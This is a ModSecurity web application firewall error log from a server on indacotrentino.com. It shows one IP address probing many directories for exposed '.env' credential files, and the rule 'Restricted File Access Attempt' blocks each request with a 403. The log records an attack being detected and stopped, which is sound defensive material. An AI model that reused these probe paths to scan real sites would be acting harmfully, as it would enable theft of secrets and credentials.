[Fri Mar 28 00:38:01.394841 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSPgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.395026 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/uploads/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSPgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.451822 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSPwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.452098 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSPwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.452947 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sitemaps/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSPwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.507590 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /saas/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSQAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.507869 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSQAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.508068 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSQAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.562466 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSQQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.562755 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSQQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.562987 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSQQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.619121 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSQgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.619391 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSQgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.619570 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/psnlink/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSQgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.673640 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSQwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.673932 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSQwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.674116 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/exapi/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSQwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.729874 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSRAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.730162 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSRAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.730473 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSRAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.783632 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSRQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.783963 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSRQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.784168 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSRQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.839024 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSRgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.839310 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSRgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.839523 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSRgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.893250 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSRwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.893554 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSRwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.893750 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSRwAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.947840 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSSAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.948114 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSSAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:01.948322 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/en/.env"] [unique_id "Z-XhWQOJJ7m4Hsc7bUYSSAAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:02.002999 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /tools/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "Z-XhWgOJJ7m4Hsc7bUYSSQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:02.003297 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "Z-XhWgOJJ7m4Hsc7bUYSSQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:02.003546 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/tools/.env"] [unique_id "Z-XhWgOJJ7m4Hsc7bUYSSQAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:02.057518 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "Z-XhWgOJJ7m4Hsc7bUYSSgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:02.057790 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "Z-XhWgOJJ7m4Hsc7bUYSSgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:02.057972 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/v1/.env"] [unique_id "Z-XhWgOJJ7m4Hsc7bUYSSgAAAAE"], referer: https://www.google.com/
[Fri Mar 28 00:38:02.111190 2025] [:error] [pid 2080986] [client 15.188.55.79:51014] [client 15.188.55.79] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/v2/.env"] [unique_id "Z-XhWgOJJ7m4Hsc7bUYSSwAAAAE"], referer: https://www.google.com/
